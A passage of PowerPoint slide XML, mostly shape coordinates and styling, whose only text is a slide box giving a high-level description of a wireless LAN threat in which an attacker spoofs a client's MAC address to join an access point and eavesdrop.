                <a:gd name="T53" fmla="*/ 707 h 735"/>
                <a:gd name="T54" fmla="*/ 311 w 2134"/>
                <a:gd name="T55" fmla="*/ 731 h 735"/>
                <a:gd name="T56" fmla="*/ 384 w 2134"/>
                <a:gd name="T57" fmla="*/ 735 h 735"/>
                <a:gd name="T58" fmla="*/ 463 w 2134"/>
                <a:gd name="T59" fmla="*/ 723 h 735"/>
                <a:gd name="T60" fmla="*/ 608 w 2134"/>
                <a:gd name="T61" fmla="*/ 719 h 735"/>
                <a:gd name="T62" fmla="*/ 685 w 2134"/>
                <a:gd name="T63" fmla="*/ 734 h 735"/>
                <a:gd name="T64" fmla="*/ 750 w 2134"/>
                <a:gd name="T65" fmla="*/ 734 h 735"/>
                <a:gd name="T66" fmla="*/ 828 w 2134"/>
                <a:gd name="T67" fmla="*/ 719 h 735"/>
                <a:gd name="T68" fmla="*/ 973 w 2134"/>
                <a:gd name="T69" fmla="*/ 723 h 735"/>
                <a:gd name="T70" fmla="*/ 1051 w 2134"/>
                <a:gd name="T71" fmla="*/ 735 h 735"/>
                <a:gd name="T72" fmla="*/ 1115 w 2134"/>
                <a:gd name="T73" fmla="*/ 732 h 735"/>
                <a:gd name="T74" fmla="*/ 1193 w 2134"/>
                <a:gd name="T75" fmla="*/ 714 h 735"/>
                <a:gd name="T76" fmla="*/ 1338 w 2134"/>
                <a:gd name="T77" fmla="*/ 727 h 735"/>
                <a:gd name="T78" fmla="*/ 1417 w 2134"/>
                <a:gd name="T79" fmla="*/ 735 h 735"/>
                <a:gd name="T80" fmla="*/ 1482 w 2134"/>
                <a:gd name="T81" fmla="*/ 730 h 735"/>
                <a:gd name="T82" fmla="*/ 1642 w 2134"/>
                <a:gd name="T83" fmla="*/ 714 h 735"/>
                <a:gd name="T84" fmla="*/ 1703 w 2134"/>
                <a:gd name="T85" fmla="*/ 730 h 735"/>
                <a:gd name="T86" fmla="*/ 1767 w 2134"/>
                <a:gd name="T87" fmla="*/ 735 h 735"/>
                <a:gd name="T88" fmla="*/ 1859 w 2134"/>
                <a:gd name="T89" fmla="*/ 723 h 735"/>
                <a:gd name="T90" fmla="*/ 1943 w 2134"/>
                <a:gd name="T91" fmla="*/ 691 h 735"/>
                <a:gd name="T92" fmla="*/ 2015 w 2134"/>
                <a:gd name="T93" fmla="*/ 640 h 735"/>
                <a:gd name="T94" fmla="*/ 2072 w 2134"/>
                <a:gd name="T95" fmla="*/ 573 h 735"/>
                <a:gd name="T96" fmla="*/ 2113 w 2134"/>
                <a:gd name="T97" fmla="*/ 495 h 735"/>
                <a:gd name="T98" fmla="*/ 2133 w 2134"/>
                <a:gd name="T99" fmla="*/ 405 h 735"/>
                <a:gd name="T100" fmla="*/ 2133 w 2134"/>
                <a:gd name="T101" fmla="*/ 330 h 735"/>
                <a:gd name="T102" fmla="*/ 2113 w 2134"/>
                <a:gd name="T103" fmla="*/ 242 h 735"/>
                <a:gd name="T104" fmla="*/ 2072 w 2134"/>
                <a:gd name="T105" fmla="*/ 162 h 735"/>
                <a:gd name="T106" fmla="*/ 2015 w 2134"/>
                <a:gd name="T107" fmla="*/ 95 h 735"/>
                <a:gd name="T108" fmla="*/ 1943 w 2134"/>
                <a:gd name="T109" fmla="*/ 44 h 735"/>
                <a:gd name="T110" fmla="*/ 1859 w 2134"/>
                <a:gd name="T111" fmla="*/ 12 h 735"/>
                <a:gd name="T112" fmla="*/ 1767 w 2134"/>
                <a:gd name="T113" fmla="*/ 0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34" h="735">
                  <a:moveTo>
                    <a:pt x="1767" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1767" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1719" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1672" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1657" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1450" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1307" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37" y="527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311" y="731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1132" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1307" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1450" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1657" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1672" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688" y="727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1719" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735" y="734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786" y="735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823" y="731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1859" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1876" y="719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894" y="714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910" y="707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943" y="691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973" y="672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2002" y="652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028" y="628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2040" y="616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2051" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2061" y="588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072" y="573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082" y="559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091" y="542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2106" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113" y="495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2118" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2133" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2133" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2118" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2106" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2061" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2051" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2040" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2002" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1876" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1859" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="0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 w="28575">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd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01" name="Rectangle 600">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BB841A-3D89-4CA0-BFC6-C5680E471656}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7832963" y="1260902"/>
              <a:ext cx="4051912" cy="100540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231775" marR="0" lvl="0" indent="-231775" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="400"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip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Hacker </a:t>
              </a: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spoofs the MAC address</a:t>
              </a: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of WLAN client equipment to mask as an authorized client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100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="400"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip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Attacker </a:t>
              </a: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connects to AP as an authorized client </a:t>
              </a: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and eavesdrops on sensitive information</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="602" name="Group 601">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ED89112-E661-4E37-A5DF-7868CE2BB108}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="568690" y="3874008"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1184" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47536AA-91B4-4EEE-AD6B-46FE10FDD94E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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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5" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
